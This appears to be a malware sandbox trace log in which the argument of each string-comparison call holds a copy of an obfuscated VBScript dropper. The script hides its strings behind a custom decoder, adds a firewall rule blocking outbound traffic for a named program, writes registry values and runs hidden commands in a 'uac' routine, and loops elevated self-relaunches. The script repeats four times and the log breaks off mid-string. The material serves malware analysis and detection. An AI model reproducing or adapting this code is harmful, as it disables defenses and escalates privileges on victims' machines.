(_String1="FAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0223.023] wcsncmp (_String1="AEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0223.024] wcsncmp (_String1="EIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0223.024] wcsncmp (_String1="IBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0223.024] wcsncmp (_String1="BSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin 